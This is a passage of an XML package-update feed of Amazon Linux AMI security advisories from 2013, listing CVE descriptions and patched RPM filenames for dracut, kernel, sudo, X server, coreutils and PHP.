arch="i686"><filename>Packages/openmpi-devel-1.5.4-2.24.amzn1.i686.rpm</filename></package><package name="openmpi" version="1.5.4" release="2.24.amzn1" epoch="0" arch="i686"><filename>Packages/openmpi-1.5.4-2.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-257</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-257: medium priority package update for dracut</title><issued date="2013-12-11 20:33:00" /><updated date="2014-09-16 22:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-4453:
It was discovered that dracut created initramfs images as world readable. A local user could possibly use this flaw to obtain sensitive information from these files, such as iSCSI authentication passwords, encrypted root file system crypttab passwords, or other information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4453" title="" id="CVE-2012-4453" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1674.html" title="" id="RHSA-2013:1674" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dracut-tools" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-tools-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-caps" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-caps-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-kernel" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-kernel-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-fips" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-fips-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-generic" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-generic-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-fips-aesni" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-fips-aesni-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-network" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-network-004-336.21.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-258</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-258: low priority package update for kernel</title><issued 
date="2013-12-11 20:33:00" /><updated date="2014-09-16 22:08:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6382:
Multiple buffer underflows in the XFS implementation in the Linux kernel through 3.12.1 allow local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the CAP_SYS_ADMIN capability for a (1) XFS_IOC_ATTRLIST_BY_HANDLE or (2) XFS_IOC_ATTRLIST_BY_HANDLE_32 ioctl call with a crafted length value, related to the xfs_attrlist_by_handle function in fs/xfs/xfs_ioctl.c and the xfs_compat_attrlist_by_handle function in fs/xfs/xfs_ioctl32.c.
1033603:
CVE-2013-6382 Kernel: fs: xfs: missing check for ZERO_SIZE_PTR
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6382" title="" id="CVE-2013-6382" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.73" release="64.112.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.73" release="64.112.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.73-64.112.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-259</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-259: low priority package update for sudo</title><issued date="2013-12-11 20:34:00" /><updated date="2014-09-16 22:10:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2777:
It was found that sudo did not properly validate the controlling terminal device when the tty_tickets option was enabled in the /etc/sudoers file. An attacker able to run code as a local user could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password.
CVE-2013-2776:
It was found that sudo did not properly validate the controlling terminal device when the tty_tickets option was enabled in the /etc/sudoers file. An attacker able to run code as a local user could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password.
CVE-2013-1775:
A flaw was found in the way sudo handled time stamp files. An attacker able to run code as a local user and with the ability to control the system clock could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775" title="" id="CVE-2013-1775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2776" title="" id="CVE-2013-2776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2777" title="" id="CVE-2013-2777" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1701.html" title="" id="RHSA-2013:1701" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-12.17.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-12.17.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-12.17.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-12.17.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-12.17.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-12.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-260</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-260: low priority package update for xorg-x11-server</title><issued date="2013-12-11 20:34:00" /><updated date="2014-09-16 22:09:00" /><severity>low</severity><description>Package 
updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1940:
A flaw was found in the way the X.org X11 server registered new hot plugged devices. If a local user switched to a different session and plugged in a new device, input from that device could become available in the previous session, possibly leading to information disclosure.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1940" title="" id="CVE-2013-1940" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1620.html" title="" id="RHSA-2013:1620" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-common" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.13.0-23.0.23.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" 
release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-23.0.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-261</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-261: low priority package update for coreutils</title><issued date="2013-12-11 20:34:00" /><updated date="2014-09-16 22:10:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0223:
It was discovered that the sort, uniq, and join utilities did not properly restrict the use of the alloca() function. An attacker could use this flaw to crash those utilities by providing long input strings.
CVE-2013-0222:
It was discovered that the sort, uniq, and join utilities did not properly restrict the use of the alloca() function. An attacker could use this flaw to crash those utilities by providing long input strings.
CVE-2013-0221:
It was discovered that the sort, uniq, and join utilities did not properly restrict the use of the alloca() function. An attacker could use this flaw to crash those utilities by providing long input strings.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0221" title="" id="CVE-2013-0221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0222" title="" id="CVE-2013-0222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0223" title="" id="CVE-2013-0223" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1652.html" title="" id="RHSA-2013:1652" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="coreutils-libs" version="8.4" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/coreutils-libs-8.4-31.17.amzn1.x86_64.rpm</filename></package><package name="coreutils" version="8.4" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/coreutils-8.4-31.17.amzn1.x86_64.rpm</filename></package><package name="coreutils-debuginfo" version="8.4" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/coreutils-debuginfo-8.4-31.17.amzn1.x86_64.rpm</filename></package><package name="coreutils-libs" version="8.4" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/coreutils-libs-8.4-31.17.amzn1.i686.rpm</filename></package><package name="coreutils" version="8.4" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/coreutils-8.4-31.17.amzn1.i686.rpm</filename></package><package name="coreutils-debuginfo" version="8.4" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/coreutils-debuginfo-8.4-31.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-262</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-262: critical priority package update for php</title><issued date="2013-12-17 21:29:00" /><updated date="2014-09-16 22:11:00" 
/><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6420:
A memory corruption flaw was found in the way the openssl_x509_parse() function of the PHP openssl extension parsed X.509 certificates. A remote attacker could use this flaw to provide a malicious self-signed certificate or a certificate signed by a trusted authority to a PHP application using the aforementioned function, causing the application to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the user running the PHP interpreter.
1036830:
CVE-2013-6420 php: memory corruption in openssl_x509_parse()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420" title="" id="CVE-2013-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-common" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.28" release="1.2.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-dba-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.28" release="1.2.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-gd-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.28" release="1.2.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-imap-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.28" release="1.2.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-mysql-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.28" release="1.2.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-tidy-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.28-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-263</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-263: critical priority package update for php54</title><issued date="2013-12-17 21:29:00" /><updated date="2014-09-16 22:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6420:
A memory corruption flaw was found in the way the openssl_x509_parse() function of the PHP openssl extension parsed X.509 certificates. A remote attacker could use this flaw to provide a malicious self-signed certificate or a certificate signed by a trusted authority to a PHP application using the aforementioned function, causing the application to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the user running the PHP interpreter.
1036830:
CVE-2013-6420 php: memory corruption in openssl_x509_parse()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420" title="" id="CVE-2013-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-xml" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.23" release="1.49.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-soap-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.23" release="1.49.amzn1" epoch="0" 